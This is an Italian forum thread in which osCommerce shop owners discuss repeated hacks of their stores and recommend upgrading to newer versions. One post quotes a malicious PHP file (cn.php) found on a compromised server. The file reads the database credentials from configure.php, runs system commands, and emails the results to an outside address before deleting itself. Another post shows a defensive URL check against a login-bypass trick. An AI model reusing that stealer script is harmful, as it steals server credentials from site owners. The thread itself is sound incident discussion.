Attacco Hacker no-stop

[tecknosat]

salve a tutti, mi sono appena inscritto perche anche io da qualche giorno sono stato attaccato con l'ho stesso problema qui descritto,
anche se provo a caricare un backup pulito delle cartelle javascript e delle cartelle include catalogo e admin, dopo pochi giorni vengo nuovamente attacato.
ho provato ad inserire la scringa qui descritta ma non mi funziona, devo essere sincero però perche io ho una versione dell'oscomtemplate.
ma fin ora ho potuto installare sempre contribution dell'oscommerce. ho anche la password in htacces in admin........
fra le altre cose, se provo a cambiare il nome all'admin modificando anche il file configure.php, non mi visualizza poi online la pagina, quindi sono costretto a riportarlo come prima...

[marcus]

devo essere sincero però perche io ho una versione dell'oscomtemplate.

Buttala via!

E' un vecchio paccchetto strabacato e non più mantenuto da anni!

Riparti con osC 2.3 ... o magari con osCPRO se vuoi un pacchetto completo e sicuro!

Saluti
Marcus

[blaso]

Stesso problema in piu' ho trovato nella cartella images un file chiamato cn.php cosi' :

Codice: Seleziona tutto

<? 
require("../includes/configure.php");


$pole = 
array(HTTP_SERVER,DB_SERVER,DB_SERVER_USERNAME,DB_SERVER_PASSWORD,DIR_WS_HTTP_CATALOG);
$system = array(system(id),system("uname -a"));
mail("special-kiss11@live.com", "hack", "server : $pole[0]$pole[4] host : 
$pole[1] user : $pole[2] password : $pole[3] 
more info: $system[0], $system[1]");
unlink("cn.php");
?>

per segnalare questo indirizzo special-kiss11@live.com qualcuno sa come fare ?

[tecknosat]

la mia versione è la oscopro 1.5, c.m.q. per quello che vedo il problema e per tutti gli oscommerce......

[maury2ma]

si è un problema di tutte le versioni VECCHIE di oscommerce e derivate.
tutte le nuove ne sono immuni.

[tecknosat]

una versione nuova sarebbe la osC 2.3?

[maury2ma]

si oscommerce 2.3.1 (non te la consiglio)
oppure fra 9 giorni esce oscommerce 3.0 (bellissima e dalle molte aspettative.... è dal 2004 che se ne parla fai te)
o usi la mia versione: oswai
o usi quella di marcus: oscpro
ovvio è solo un mio parere.

[tecknosat]

grazie per i consigli

[tecknosat]

una domanda, cambiando versione(da oscomtemplate a oscommerce) è possibile poi installare il mio database?

[maury2ma]

si e no.
si nel senso che puoi adattarlo
no nel senso che cosi' com'è non puoi farci nulla, devi metterci le manine e modificare/aggiungere/eliminare delle tabelle.
non è un aocsa semplice ed indolore, è un lavoro noioso.... molto noioso

[06voip]

Codice: Seleziona tutto

// controlla eventuali intrusioni non autorizzate che sfruttino un bug del sistema
  $url_php_self = !isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
  if (
          ( (substr_count($url_php_self, ".php/" . FILENAME_LOGIN) ) != 0)
       || ( (substr_count($url_php_self, ".php/" . FILENAME_PASSWORD_FORGOTTEN) ) != 0)
       || ( (substr_count($url_php_self, ".php/" . FILENAME_FORBIDDEN) ) != 0)
       || ( (substr_count($url_php_self, ".php") ) >= 2)
     ) {
    tep_redirect(tep_href_link('index.php'));
  }
  if (basename($url_php_self) != $PHP_SELF) {
    tep_redirect(tep_href_link('index.php'));
  }

caspita mi piacerebbe conoscerli tutti! ho provato ad approfondire questo e ce l'ho su mio primo shop, il secondo dove ho fatto gli update alla 2.3.1 a questo ne è immune, di certo spaziale.. fortunatamente in un anno che è on-line non ho subito attacchi però..

[hsg26]

si oscommerce 2.3.1 (non te la consiglio)
oppure fra 9 giorni esce oscommerce 3.0 (bellissima e dalle molte aspettative.... è dal 2004 che se ne parla fai te)
o usi la mia versione: oswai
o usi quella di marcus: oscpro
ovvio è solo un mio parere.

la 3 non sarà completa fino almeno a dicembre. Se uno vuole ripartire o fare uno shop ora, per ragioni di sicurezza e di pulizia del codice è meglio se usa la 2.3.1

[maury2ma]

concordo... speravo uscisse una 3 stabile ed affidabile.... invece
mi rimangio le parole continuate ad usare la 2.3.1 è moltooooo meglio.